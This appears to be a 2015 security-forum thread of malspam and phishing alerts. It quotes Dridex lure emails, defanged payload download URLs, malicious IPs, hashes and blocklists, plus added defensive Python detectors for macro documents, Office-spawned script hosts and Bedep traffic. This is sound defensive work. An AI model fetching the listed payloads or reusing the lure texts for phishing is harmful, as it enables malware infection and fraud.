... which is a macro downloader that downloads Dridex banking malware in exactly the -same- way and from the same series of locations as today’s other malspam runs 'Notification of Vehicle Tax DD Payment Schedule (Ref: 000000-000005-274421-001)' - word doc or excel xls spreadsheet malware -and- 'Scanned from a Xerox Multifunction Printer' – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/369c3e84e9a288b3f2df0672c3dd2eaa208c9d2e6ac10c36a04b9e3ff52f8b4d/analysis/1435313019/
- http://blog.dynamoo.com/2015/06/malware-spam-order-confirmation-ret.html
26 June 2015
"... Recommended blocklist:
68.169.49.213
87.236.215.151
2.185.181.155 "
colchester-institute .com: 213.171.218.136: https://www.virustotal.com/en-gb/ip-address/213.171.218.136/information/
___
Fake 'Transport' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/email-from-transport-for-london-word-doc-or-excel-xls-spreadsheet-malware-2/
26 June 2015 - "Email from 'Transport for London' pretending to come from noresponse@ cclondon .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Please open the attached file to view correspondence from Transport for
London.
If the attachment is in DOC format you may need Adobe Acrobat Reader to
read or download this attachment.
Thank you for contacting Transport for London.
Business Operations
Customer Service Representative
This email has been scanned by the Symantec Email Security.cloud service...
26 June 2015: AP0210932630.doc - Current Virus total detections: 5/54*
... which is yet another in today’s -malspam- series of macro malware downloaders that deliver Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/a97b05797f326e8e8ba79f12d15a523096be31b13c19d7569b82995b957616ec/analysis/1435315714/
___
Samsung's bundled SW Update tool actively -disables- Windows Update on reboot
- http://arstechnica.com/information-technology/2015/06/samsung-silently-disabling-windows-update-on-some-computers/
Updated, June 25... "... We have reached out to both Samsung and Microsoft for comment, but they hadn't replied at the time of publishing... SW Update is included on many Samsung PCs, but it's possible that Disable_Windowsupdate.exe is only being executed on a subset of devices that are "incompatible" with Windows Update. If you have a Samsung laptop, perhaps go and check if Windows Update is still enabled..."
> Unresolved.
- http://www.neowin.net/news/samsung-cripples-windows-update-to-help-your-settings
Jun 24, 2015
___
Critical flaw in ESET products...
- http://www.infoworld.com/article/2939759/security/critical-flaw-in-eset-products-shows-why-spy-groups-are-interested-in-antivirus-programs.html
Jun 24, 2015 - "Several antivirus products from security firm ESET had a critical vulnerability that was easy to exploit and could lead to a full system compromise. The discovery of the flaw, which has now been patched*, comes on the heels of a report that intelligence agencies from the U.K. and the U.S. are reverse engineering antivirus products in search for vulnerabilities and methods to bypass detection..."
* http://www.virusradar.com/en/update/info/11824
2015-06-22 - "A security vulnerability has been -fixed- in the scanning engine..."
___
Memo Spam
- http://threattrack.tumblr.com/post/122516583493/memo-spam
26 June 2015 - "Subjects Seen:
Memo dated 9th June
Memo dated 13th March
Screenshot: https://36.media.tumblr.com/f0a1d3289633d50e98c984669d0bef6f/tumblr_inline_nqkat2Drzx1r6pupn_500.png
Typical e-mail details:
Be acknowledged that on Monday the 6th of May a letter was forwarded to chief accountant The indicated act has important information considering the levy refund procedure
We ask you to verify the proper receiving of the facsimile .
For Your convenience this document had been attached.
Helen Smith
Tax Officer
Malicious File Name and MD5:
fragment_of_the_forwarded_prescript.exe (d8885ab98d6e60295a4354050827955e)
Tagged: Memo, Upatre
___
Stop Spamming Me Spam
- http://threattrack.tumblr.com/post/122423543503/stop-spamming-me-spam
25 June 2015 - Subjects Seen
stop spamming me
Screenshot: https://40.media.tumblr.com/754a6563af064dc0d95dbe704bbbaa77/tumblr_inline_nqi9o9eMIU1r6pupn_500.png
Typical e-mail details:
stop sending me offers from towcaps.com
i am not interested.
i have attached the email i received from jmcfarland@ towcaps .com.
please stop
Malicious File Name and MD5:
email_message.doc (26185bf0c06d8419c09c76a0959d2b85)
Tagged: Word Macro Exploit, Fareit, Stop Spamming
___
Signed CryptoWall 3.0 variant delivered via MediaFire
- http://research.zscaler.com/2015/06/signed-cryptowall-30-variant-delivered.html
June 4, 2015 - "... search lead us to this e-mail campaign* where the attachment contains a Microsoft Compiled HTML help (CHM) file that leads to the download and execution of the the latest CryptoWall 3.0 variant hosted on MediaFire..."
* https://techhelplist.com/index.php/spam-list/834-you-have-a-new-encrypted-message-from-jpmorgan-chase-co-malware
>> https://malwr.com/analysis/MTBhNWQ5NjRiZGMzNDIyNGE3Y2VmMGIyOWZjM2I3YTU/
"... Hosts..."
[CryptoWall 3.0] / -Still- -all- pumping badness 6.26.2015 !!
IP
188.165.164.184: https://www.virustotal.com/en/ip-address/188.165.164.184/information/
184.168.47.225: https://www.virustotal.com/en/ip-address/184.168.47.225/information/
62.221.204.114: https://www.virustotal.com/en/ip-address/62.221.204.114/information/
80.93.54.18: https://www.virustotal.com/en/ip-address/80.93.54.18/information/
50.62.160.229: https://www.virustotal.com/en/ip-address/50.62.160.229/information/
217.70.180.154: https://www.virustotal.com/en/ip-address/217.70.180.154/information/
184.168.174.1: https://www.virustotal.com/en/ip-address/184.168.174.1/information/
64.202.165.42: https://www.virustotal.com/en/ip-address/64.202.165.42/information/
46.235.40.4: https://www.virustotal.com/en/ip-address/46.235.40.4/information/
194.6.233.7: https://www.virustotal.com/en/ip-address/194.6.233.7/information/
:fear::fear: :mad:
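Added example of my own, not code from myonlinesecurity, dynamoo or ThreatTrack: a stdlib-only heuristic for "does this attachment carry a VBA project or an embedded object", for the Dridex macro downloaders above and the .rtf variants that follow. It identifies the container by magic bytes (a .doc that is really RTF is common), then looks for the compound-file storage names that only a VBA project creates, the vbaProject.bin part and macroEnabled content type in OOXML, and \objdata / \objemb control words in RTF. The sample documents are constructed stubs with just enough structure to trip the checks; for real triage use oletools' olevba, which parses the VBA project properly.

```python
from __future__ import annotations

import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls compound file
ZIP_MAGIC = b"PK\x03\x04"                        # .docx/.docm/.xlsx/.xlsm container
RTF_MAGIC = b"{\\rtf"
# Storage/stream names that exist only when a VBA project is present. The
# compound-file directory stores names as UTF-16LE, so that is what we search for.
VBA_STREAM_NAMES = ("_VBA_PROJECT", "VBA_PROJECT_CUR", "Macros")
RTF_OBJECT_WORDS = (b"\\objdata", b"\\objemb", b"\\objupdate")


def macro_indicators(data: bytes) -> list[str]:
    """Return the reasons a document looks macro- or object-bearing; empty means nothing found."""
    hits: list[str] = []
    if data.startswith(OLE_MAGIC):
        for name in VBA_STREAM_NAMES:
            if name.encode("utf-16-le") in data:
                hits.append(f"OLE stream/storage named {name!r}")
    elif data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
                for n in names:
                    if n.lower().endswith("vbaproject.bin"):
                        hits.append(f"OOXML part {n}")
                if "[Content_Types].xml" in names and b"macroEnabled" in zf.read("[Content_Types].xml"):
                    hits.append("content type declares macroEnabled")
        except zipfile.BadZipFile:
            hits.append("ZIP magic but container does not parse")
    elif data.startswith(RTF_MAGIC):
        for word in RTF_OBJECT_WORDS:
            if word in data:
                hits.append(f"RTF embedded object ({word.decode()})")
    return hits


def sample_ole_with_vba() -> bytes:
    """Constructed stand-in for a macro .doc: valid magic plus a directory name; not a parsable OLE file."""
    return OLE_MAGIC + b"\x00" * 504 + "_VBA_PROJECT".encode("utf-16-le") + b"\x00" * 100


def sample_docm() -> bytes:
    """Constructed macro-enabled OOXML container with the parts a real .docm would carry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/word/document.xml" '
                    'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


def sample_clean_docx() -> bytes:
    """Constructed macro-free container, for the negative case."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/word/document.xml" '
                    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def sample_rtf_with_object() -> bytes:
    """Constructed RTF carrying an embedded OLE object."""
    return b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata 0105000002000000}}}"


if __name__ == "__main__":
    for label, doc in (("ole", sample_ole_with_vba()), ("docm", sample_docm()),
                       ("docx", sample_clean_docx()), ("rtf", sample_rtf_with_object())):
        print(label, macro_indicators(doc) or "no indicators")
```

Run it as `macro_indicators(open(path, "rb").read())` on anything that arrives as .doc/.xls/.rtf; a hit does not prove malice (plenty of legitimate spreadsheets carry macros), but combined with an unsolicited sender it is exactly the attachment the "NEVER open any attachment unless you are expecting it" rule is about.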
AplusWebMaster
2015-06-29, 13:32
FYI...
Multiple Exploit kits abuse CVE-2015-3113
- http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html
June 29, 2015 - "Patched... (2015-06-23) with Flash 18.0.0.194*, the CVE-2015-3113 has been spotted as a 0day by FireEye, exploited in limited targeted attacks. It's now making its path to Exploit Kits...
Magnitude: 2015-06-27 ... IE11 in Windows 7... 2015-06-27
Angler EK: 2015-06-29 ... IE11 in Windows 7... 2015-06-29
* https://helpx.adobe.com/security/products/flash-player/apsb15-14.html
> https://technet.microsoft.com/en-us/library/security/2755801
June 23, 2015
___
Fake 'Hello' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/hello-word-doc-or-excel-xls-spreadsheet-malware/
29 June 2015 - "'Hello' pretending to come from Willa <swaffs@ tiscali .co.uk> with a malicious word doc rtf attachment is another one from the current bot runs... The email looks like:
I reserved for myself and friends three double rooms with 30.06 to 14:06.
I wanted to change a reservation!
Because some friends canceled, I would like to change reservation to two double room!
Thanks!
Therese.
28 June 2015: document.rtf - Current Virus total detections: 8/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/f323bcc11ee34b2158a6d73db81cd76e64cdea5a7fa8e9cf59a1db4f59bc9adf/analysis/1435533593/
___
Fake 'WhatsApp Chat' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/whatsapp-chat-with-jay-stephenson-word-doc-or-excel-xls-spreadsheet-malware/
29 June 2015 - "'WhatsApp Chat with Jay Stephenson' pretending to come from your own email address with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Chat history is attached as “WhatsApp Chat: Jay Stephenson.txt” file to this email.
29 June 2015 : WhatsApp Chat_ Jay Stephenson.doc Current Virus total detections: 4/55*
... Which downloads Dridex banking malware from http ://dev.seasonsbounty .com/543/786.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/1dd4601705e197fe4528a50a4cca282ea9ffb45249ff5fdb3d538a79dccea157/analysis/1435562464/
** https://www.virustotal.com/en-gb/file/4409a44e91dc654a91b7a9b73af8f51b60b3b6e89beabe08d79179ddd7d5209e/analysis/1435564213/
... Behavioural information
TCP connections
78.47.139.58: https://www.virustotal.com/en-gb/ip-address/78.47.139.58/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
seasonsbounty .com: 104.28.28.38: https://www.virustotal.com/en-gb/ip-address/104.28.28.38/information/
104.28.29.38: https://www.virustotal.com/en-gb/ip-address/104.28.29.38/information/
___
Fake 'CEF Documents' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/cef-documents-dawn-sandel-word-doc-or-excel-xls-spreadsheet-malware/
29 June 2015 - "'CEF Documents' pretending to come from Dawn.Sandel@ cef .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached the following documents issued by City Electrical Factors:
Invoice – BLA/176035 – DUCHMAID
If you have any problems or questions about these documents then please do not hesitate to contact us.
Regards,
Dawn Sandel ...
29 June 2015 : BLA176035.doc - Current Virus total detections: 5/56*
... Downloads the same Dridex banking malware as described in today’s earlier malspam run of malicious word docs 'WhatsApp Chat with Jay Stephenson' – word doc or excel xls spreadsheet malware** ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/c1188f42836fce82819134340b1726fdb1ee3234aaaef1674924602ead39b1ef/analysis/1435572586/
** http://myonlinesecurity.co.uk/whatsapp-chat-with-jay-stephenson-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/06/malware-spam-cef-documents.html
29 June 2015
"... Recommended blocklist:
78.47.139.58
87.236.215.151
91.121.173.193
183.81.166.5 "
___
Fake 'Payslip' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-payslip-for-period-end.html
29 June 2015 - "This -fake- financial spam comes with a malicious payload:
From: noreply@ fermanagh .gov.uk [noreply@ fermanagh .gov.uk]
Date: 29 June 2015 at 11:46
Subject: Payslip for period end date 29/06/2015
Dear [redacted]
Please find attached your payslip for period end 29/06/2015
Payroll Section
Attached is a file payslip.zip which contains the malicious executable payslip.exe which has a VirusTotal detection rate of 8/55*. Automated analysis... shows a file being downloaded from:
http :// audileon .com.mx/css/proxy_v29.exe . That binary has a detection rate of just 2/55 [Malwr analysis**]. Also, Hybrid Analysis... shows the following IPs are contacted for what looks to be malicious purposes:
69.73.179.87 (Landis Holdings Inc, US)
67.219.166.113 (Panhandle Telecommunications Systems Inc., US)
212.37.81.96 (ENERGOTEL a.s./ Skylan s.r.o, Slovakia)
209.193.83.218 (Visionary Communications Inc., US)
67.206.96.30 (Chickasaw Telephone, US)
208.123.129.153 (Secom Inc , US)
91.187.75.75 (Servei De Telecomunicacions D'Andorra, Andorra)
84.16.55.122 (ISP Slovanet (MNET) Brezno, Czech Republic)
178.219.10.23 (Orion Telekom, Serbia)
194.28.190.84 (AgaNet Agata Goleniewska, Poland)
83.168.164.18 (SWAN, a.s. TRIO network, Slovakia)
178.54.231.147 (PP Merezha, Ukraine)
75.98.158.55 (Safelink Internet, US)
67.206.97.238 (Chickasaw Telephone, US)
176.197.100.182 (E-Light-Telecom, Russia)
31.134.73.151 (Trk Efir Ltd., Ukraine)
188.255.241.22 (Orion Telekom, Serbia)
31.42.172.36 (FLP Pirozhok Elena Anatolevna, Ukraine)
67.207.228.144 (Southwest Oklahoma Internet, US)
176.120.201.9 (Subnet LLC, Russia)
109.87.63.98 (TRIOLAN / Content Delivery Network Ltd, Ukraine)
38.124.169.148 (PSINet, US)
80.87.219.35 (DSi DATA s.r.o., Slovakia)
195.34.206.204 (Private Enterprise Radionet, Ukraine)
93.119.102.70 (Moldtelecom LIR, Moldova)
184.164.97.242 (Visionary Communications Inc., US)
I am unable to determine exactly what the payload is..."
Recommended blocklist: the same IPs as listed above. "
* https://www.virustotal.com/en/file/7abf401381b81d0effcf074df3fe1d38b38cf513f8ec202fbe1ce150c45c6f8d/analysis/1435584105/
** https://malwr.com/analysis/M2FkNDQyNGY0YjdkNDdiN2E3ZjQ3MWE1Y2RkYTg2Mzc/
audileon .com.mx: 69.73.179.87: https://www.virustotal.com/en/ip-address/69.73.179.87/information/
___
Fake 'Paypal' PHISH...
- http://myonlinesecurity.co.uk/receipt-for-your-paypal-payment-to-zynga-gamesfacebook-com-phishing/
28 June 2015 - "'Receipt for your PayPal payment to Zynga Games@ facebook .com' pretending to come from service@ paypal .com.au <payment.refunds@ netcabo .pt> is one of the latest -phish- attempts to steal your Paypal account and your Bank, credit card and personal details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/paypal_save-the-whales-phish_email.png
The link in the email when you hover over it sends you to http ://guyit64d43tyw45uaer .saves-the-whales .com/ATERJT 8OYG8 JHG5R8 YRDTDY JYUGH DRYCJ/
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-1.png
After entering email and password, you get sent to a page saying your account has been -frozen- due to fraud, continue to resolution centre to sort it out.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/paypal_save-the-whales-phish.png
Following that link gets you to the nitty-gritty of the phishing scam and you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-2.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
saves-the-whales .com: 204.13.248.119: https://www.virustotal.com/en-gb/ip-address/204.13.248.119/information/
afrikids .com.mx: 192.185.140.214: https://www.virustotal.com/en-gb/ip-address/192.185.140.214/information/
:fear::fear: :mad:
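The Word and Excel attachments in this post all do the same thing: a macro fetches an executable and runs it. A process-creation check for Office applications launching a program from a user-writable folder, or a script host, catches that step on the endpoint. This is an added example, not code from any of the quoted blogs; the event records are constructed in a Sysmon-like key=value layout, and the folder list and file names are assumptions.

```python
import re

# Office parents whose child processes deserve scrutiny.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts a macro typically uses to stage a download.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Folders a macro-dropped payload is commonly written to (assumption; extend for your estate).
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|AppData\\Roaming|Downloads|ProgramData)\\", re.I)


def parse_event(line):
    """Parse one constructed 'key=value;key=value' process-creation record into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";"))


def basename(path):
    """Last path component, lower-cased, so 'C:\\...\\WINWORD.EXE' compares as 'winword.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert string when an Office process spawns something suspicious, else None."""
    parent = basename(event.get("ParentImage", ""))
    if parent not in OFFICE_PARENTS:
        return None          # only Office-spawned processes are in scope here
    image = event["Image"]
    child = basename(image)
    if USER_WRITABLE.search(image):
        return f"{parent} launched {image} from a user-writable location"
    if child in SCRIPT_HOSTS:
        return f"{parent} launched script host {child}: {event.get('CommandLine', '')}"
    return None              # e.g. the print spooler helper Word starts legitimately


def scan(lines):
    """Run classify() over raw records and keep only the findings."""
    return [f for f in (classify(parse_event(line)) for line in lines) if f]


# Constructed sample events (EventID 1 style); paths and names are not real telemetry.
SAMPLE_EVENTS = [
    "EventID=1;Image=C:\\Users\\bob\\AppData\\Local\\Temp\\payload.exe;"
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE;CommandLine=payload.exe",
    "EventID=1;Image=C:\\Windows\\System32\\cmd.exe;"
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE;CommandLine=cmd /c start stage2",
    "EventID=1;Image=C:\\Windows\\splwow64.exe;"
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE;CommandLine=splwow64.exe 12288",
    "EventID=1;Image=C:\\Users\\bob\\AppData\\Local\\Temp\\setup.exe;"
    "ParentImage=C:\\Windows\\explorer.exe;CommandLine=setup.exe",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```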
AplusWebMaster
2015-06-30, 14:32
FYI...
Fake Twitter Verification Profile leads to Phishing, Credit Card Theft
- https://blog.malwarebytes.org/fraud-scam/2015/06/fake-twitter-verification-profile-leads-to-phishing-credit-card-theft/
June 30, 2015 - "... we’ve come across a -bogus- Twitter account harbouring a nasty surprise for anybody taken in by their fakery. Twitter Feed “Verified6379” claims to be an “Official Verification Page” with a link to a shortened Goo.gl URL. The site it directs visitors to is:
verifiedaccounts(dot)byethost9(dot)com/go(dot)html
Here’s the Twitter feed in question:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/faketwtverif0.jpg
... This week has seen 3,000+ click the link so far, with the majority of visitors coming from the US and UK. What do those with a thirst for verification see upon hitting the page? A rather nasty double whammy of phishing and payment information theft. First up, the -phish- which asks for Username, Password and Email along with questions about why the victim thinks they should be verified, if they’ve ever been suspended and how many followers they have. Note that once the accounts have been compromised, information such as follower count makes it easy for the phisher to work out which are the best ones to use to spread more malicious links:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/faketwtverif1.jpg
After this, the verification hunter will be presented with the below screen:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/faketwtverif2.jpg
The page reads as follows:
Congratulations! You are one step away from being verified, please understand we require each user to pay the $4.99 verification fee. Processing this fee allows us to verify your identity much faster.
Uh oh. They then go on to ask for card number, expiration date, CVV, name, address, phone number, state, country and zip code along with a confirmation email. There’s no way to know how many people completed all of the steps, but there’s potential here for the scammers to have made off with quite the haul of stolen accounts and pilfered payment credentials. Note that the so-called payment page doesn’t have a secured connection either, so if a third party happened to be snooping traffic and you were on an insecure connection there’d now be two people running around with your information instead of just one. We’ve seen a number of possibly related accounts pushing out similar links, all offline / suspended at time of writing. There’s sure to be others floating around, so please be careful with your logins... more information on Twitter Verification, you should read their FAQ page. From a related article:
'Twitter currently does -not- accept applications for verification. If we identify your account as being eligible, we will reach out to you to start the verification process'.
The only Twitter feed you should pay any attention to with regard to the little blue tick is the Official Verification account – anybody else should be treated with caution, especially if asking for logins via Direct Message or websites asking for -credentials- and / or -payment- information..."
verifiedaccounts(dot)byethost9(dot)com: 185.27.134.210: https://www.virustotal.com/en/ip-address/185.27.134.210/information/
___
Fake 'Bank payment' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/bank-payment-sbp-beauty-lifestyle-hairandhealth-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
30 June 2015 - "'Bank payment' pretending to come from sarah@ hairandhealth .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached a bank payment for 28th June 2015 for £288.00
to pay inv 1631 less cr 1129. With thanks.
Kind regards
Sarah
Accounts
SBP Beauty & Lifestyle
30 June 2015: Bank payment 281014.doc - Current Virus total detections: 3/56*
... Downloads Dridex banking malware from:
http ://www .medisinskyogaterapi .no/59/56.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/50fa7ce0c13cdeac8006f12ae4669192cb53adf5953ce48c387ecc1bdb13c270/analysis/1435652743/
** https://www.virustotal.com/en/file/49e611323dd020e5df8f91c2f4005f05fc09213ceb8983d695dc4b93a32f02d4/analysis/1435653462/
... Behavioural information
TCP connections
78.47.139.58: https://www.virustotal.com/en/ip-address/78.47.139.58/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
___
Fake 'Payment due' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/06/malware-spam-donna-vipond-donnavipondev.html
30 June 2015 - "This -fake- invoice does not come from Event Furniture Ltd but is instead a simple forgery with a malicious attachment:
From "Donna Vipond" [donna.vipond@ ev-ent .co.uk]
Date Tue, 30 Jun 2015 13:13:28 +0100
Subject Payment due - 75805
Please advise when we can expect to receive payment of the attached
invoice now due? I await to hear from you.
Kind Regards
Donna Vipond
Accounts
Event Furniture Ltd T/A Event Hire
Tel: 01922 628961 x 201
Attached is a file 75805.doc which comes in two (or more) different versions (Hybrid Analysis report). The samples I saw downloaded a file from either:
www .medisinskyogaterapi .no/59/56.exe
www .carpstory .de/59/56.exe
This is saved as %TEMP%\silvuple.exe and it has a VirusTotal detection rate of 6/55*. The various analyses including Malwr report and Hybrid Analysis indicate malicious traffic to 78.47.139.58 (Hetzner, Germany). The payload is probably the Dridex banking trojan.
Recommended blocklist:
78.47.139.58 "
* https://www.virustotal.com/en/file/f577a7862c68e0114201e4313b53bd2f48f36665f5fe00fe0ffbb41ccaedeabc/analysis/1435667157/
medisinskyogaterapi .no: 178.164.11.101: https://www.virustotal.com/en/ip-address/178.164.11.101/information/
carpstory .de: 81.169.145.164: https://www.virustotal.com/en/ip-address/81.169.145.164/information/
- http://myonlinesecurity.co.uk/payment-due-75805-donna-vipond-event-furniture-word-doc-or-excel-xls-spreadsheet-malware/
30 June 2015 - "... -same- Dridex banking malware as today’s other malspam run of macro enabled word docs Bank payment SBP Beauty & Lifestyle hairandhealth .co.uk* – word doc or excel xls spreadsheet malware..."
> https://www.virustotal.com/en/file/e14b3d3487e112648002d70db804e24e2d123d3ecb22f2e2cbd0276bd743a815/analysis/1435667097/
* http://myonlinesecurity.co.uk/bank-payment-sbp-beauty-lifestyle-hairandhealth-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
___
RFC 7568 Deprecates SSLv3 As Insecure
- http://tech.slashdot.org/story/15/06/30/1457204/rfc-7568-deprecates-sslv3-as-insecure
June 30, 2015 - "SSLv3 should -not- be used*, according to the IETF's RFC 7568. Despite being replaced by three versions of TLS, SSLv3 is still in use. Clients and servers are now recommended to reject requests to use SSLv3 for secure communication. "SSLv3 Is Comprehensively Broken" ** say the authors, and lay out its flaws in detail."
* http://tools.ietf.org/html/rfc7568
** http://tools.ietf.org/html/rfc7568#section-4
___
Malvertising targeting the Netherlands
- http://blog.fox-it.com/2015/06/15/large-malvertising-campaign-targeting-the-netherlands/
Update 16-06-2015: "After coordinating with the advertisers the malicious host was -blocked- and removed from their advertisement platforms. Indicators of Compromise:
The following IP and domain should be -blocked- in order to avoid the current campaign:
otsmarketing[.]com / 107[.]181[.]187[.]81
The Angler Exploit kit typically installs the Bedep Trojan, which installs -additional- malware. Bedep can typically be found by looking at consecutive POST requests to the following two websites:
earthtools .org/timezone/0/0
ecb.europa .eu/stats/eurofxref/eurofxref-hist-90d.xml
We have yet to identify the final payload."
107.181.187.81: https://www.virustotal.com/en/ip-address/107.181.187.81/information/
earthtools .org: Could not find an IP address for this domain name.
ecb.europa .eu: 208.113.226.171: https://www.virustotal.com/en/ip-address/208.113.226.171/information/
:fear::fear: :mad:
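The two Bedep check-in URLs named in the Fox-IT update above give a straightforward proxy-log detection: a single POST to either site is ordinary traffic, but one client POSTing to both within a short window is the pattern described. This is an added example, not Fox-IT's code; the log lines are constructed, and the 120-second window is an assumption.

```python
from collections import defaultdict
from datetime import datetime

# Bedep check-in URLs quoted in the Fox-IT write-up (host, path).
BEDEP_MARKERS = (
    ("earthtools.org", "/timezone/0/0"),
    ("ecb.europa.eu", "/stats/eurofxref/eurofxref-hist-90d.xml"),
)
WINDOW_SECONDS = 120  # assumption: the two POSTs land within two minutes of each other


def parse_line(line):
    """Parse one constructed proxy log line: '<iso-timestamp> <client> <method> <host> <path>'."""
    ts, client, method, host, path = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), client, method, host.lower(), path


def marker_index(method, host, path):
    """Return 0 or 1 for a POST to one of the two marker URLs, None for anything else."""
    if method != "POST":
        return None
    for i, (mhost, mpath) in enumerate(BEDEP_MARKERS):
        if host == mhost and path == mpath:
            return i
    return None


def find_bedep_clients(lines, window=WINDOW_SECONDS):
    """Return sorted client addresses that POSTed to both marker URLs within `window` seconds."""
    seen = defaultdict(lambda: ([], []))  # client -> (timestamps for marker 0, for marker 1)
    for line in lines:
        ts, client, method, host, path = parse_line(line)
        idx = marker_index(method, host, path)
        if idx is not None:
            seen[client][idx].append(ts)
    hits = set()
    for client, (first, second) in seen.items():
        for t0 in first:
            # Either order is accepted; only the time gap matters.
            if any(abs((t1 - t0).total_seconds()) <= window for t1 in second):
                hits.add(client)
                break
    return sorted(hits)


# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    "2015-06-16T10:00:01 10.1.1.5 GET  www.example.com /index.html",
    "2015-06-16T10:00:03 10.1.1.5 POST earthtools.org /timezone/0/0",
    "2015-06-16T10:00:04 10.1.1.5 POST ecb.europa.eu /stats/eurofxref/eurofxref-hist-90d.xml",
    # an analyst fetching the ECB rates with GET is not a Bedep pattern
    "2015-06-16T10:05:00 10.1.1.9 GET  ecb.europa.eu /stats/eurofxref/eurofxref-hist-90d.xml",
    # two POSTs hours apart fall outside the default window
    "2015-06-16T11:00:00 10.1.1.7 POST earthtools.org /timezone/0/0",
    "2015-06-16T13:00:00 10.1.1.7 POST ecb.europa.eu /stats/eurofxref/eurofxref-hist-90d.xml",
]

if __name__ == "__main__":
    print(find_bedep_clients(SAMPLE_LOG))  # → ['10.1.1.5']
```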
AplusWebMaster
2015-07-01, 15:06
FYI...
Fake 'swift bank transfers' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/a-series-of-emails-on-the-theme-of-swift-bank-transfers-word-doc-or-excel-xls-spreadsheet-malware/
1 July 2015 - "A series of emails on the theme of swift bank transfers pretending to come from random email addresses and random senders with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Some subjects seen are:
Fw: Automated Clearing House VRD4OB
Fw: Notification 9XLM1B
Fwd Invoice A6MV0KAOT ... The email looks like these:
The RecentJ transfer, just initiated from your company’s online banking account, was rejected by the Electronic Payments Association2.
DeniedZ SWIFT transfer
Transaction4 Case ID 8L515KJY
Total Amount 3526.76 USD ...
Reason of abort See attached statement
Please click the file given with this email to get more information about this issue.
-Or-
The SWIFTD transfer, recently sent from your company’s online bank account, was aborted by the Electronic Payments AssociationV.
Denied2 transaction
TransferB Case ID CUV0RUF
Total Amount 1953.61 US Dollars ...
Reason of abort See attached word document
Please click the doc file attached below to get more info about this issue.
1 July 2015: EBRSONOU.doc | JIZES.doc | XWUDNJK.doc
Current Virus total detections: 4/56* | 4/56** | 4/56*** |
... All of which try to connect to these 2 sites and download a base64 encoded text file from the first location and a simple test text from the second location.
www .fresh-start-shopping .com/wp-content/uploads/2015/06/167362833333.txt
www .gode-film .dk/wp-content/uploads/2015/06/kaka.txt
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
